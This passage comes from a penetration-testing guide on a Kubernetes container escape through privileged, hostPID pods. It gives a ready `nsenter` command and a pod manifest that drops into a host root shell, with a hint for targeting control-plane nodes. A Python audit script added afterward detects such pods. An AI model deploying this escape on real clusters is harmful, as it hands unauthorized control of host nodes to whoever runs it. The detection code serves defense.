With these privileges you will have access to the host's processes and enough privileges to enter the namespaces of one of the host's processes.
Note that you may not need privileged, but only certain capabilities and other potential defense bypasses (such as AppArmor and/or seccomp).
Executing something like the following will allow you to escape from the pod:
    nsenter --target 1 --mount --uts --ipc --net --pid -- bash
Configuration example:
    apiVersion: v1
    kind: Pod
    metadata:
      name: priv-and-hostpid-exec-pod
      labels:
        app: pentest
    spec:
      hostPID: true
      containers:
      - name: priv-and-hostpid-pod
        image: ubuntu
        tty: true
        securityContext:
          privileged: true
        command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
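To find pods that already carry this combination, the following added example (not part of the original page) audits the JSON printed by `kubectl get pods -A -o json` for `hostPID: true` together with `privileged`, risky added capabilities, or an unconfined seccomp profile. The `RISKY_CAPS` set, the function names and the sample pods other than the first are assumptions made for illustration.

```python
# Assumption (not from the page): capabilities treated as sufficient, with
# hostPID, to enter a host process's namespaces without "privileged: true".
RISKY_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "ALL"}

def audit_pod(pod):
    """Return [(pod, container, [reasons])] for hostPID pods that can reach host namespaces."""
    spec = pod.get("spec", {})
    if not spec.get("hostPID"):
        return []  # host PID 1 is not visible, so this combination does not apply
    pod_sc = spec.get("securityContext") or {}
    findings = []
    for kind in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(kind) or []:
            sc = c.get("securityContext") or {}
            reasons = []
            if sc.get("privileged"):
                reasons.append("privileged")
            added = {cap.upper() for cap in (sc.get("capabilities") or {}).get("add") or []}
            reasons += sorted("cap:" + cap for cap in added & RISKY_CAPS)
            # A container-level seccomp profile overrides the pod-level one.
            seccomp = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
            if seccomp.get("type") == "Unconfined":
                reasons.append("seccomp:Unconfined")
            if reasons:
                findings.append((pod["metadata"]["name"], c["name"], reasons))
    return findings

def audit(pod_list):
    """Audit the object printed by `kubectl get pods -A -o json`."""
    return [f for pod in pod_list.get("items", []) for f in audit_pod(pod)]

# Constructed sample input: the first item mirrors the manifest on this page.
SAMPLE = {"items": [
    {"metadata": {"name": "priv-and-hostpid-exec-pod"},
     "spec": {"hostPID": True, "containers": [
         {"name": "priv-and-hostpid-pod", "securityContext": {"privileged": True}}]}},
    {"metadata": {"name": "caps-only"},
     "spec": {"hostPID": True,
              "securityContext": {"seccompProfile": {"type": "Unconfined"}},
              "containers": [{"name": "agent", "securityContext": {
                  "capabilities": {"add": ["SYS_PTRACE", "NET_BIND_SERVICE"]}}}]}},
    {"metadata": {"name": "hostpid-only"},
     "spec": {"hostPID": True, "containers": [
         {"name": "ps", "securityContext": {"capabilities": {"drop": ["ALL"]}}}]}},
    {"metadata": {"name": "web"}, "spec": {"containers": [{"name": "nginx"}]}},
]}

if __name__ == "__main__":
    for pod, container, reasons in audit(SAMPLE):
        print(f"{pod}/{container}: hostPID + {', '.join(reasons)}")
```

The check is deliberately narrow: it reports only the hostPID combination discussed here, so a privileged pod without `hostPID` needs its own rule.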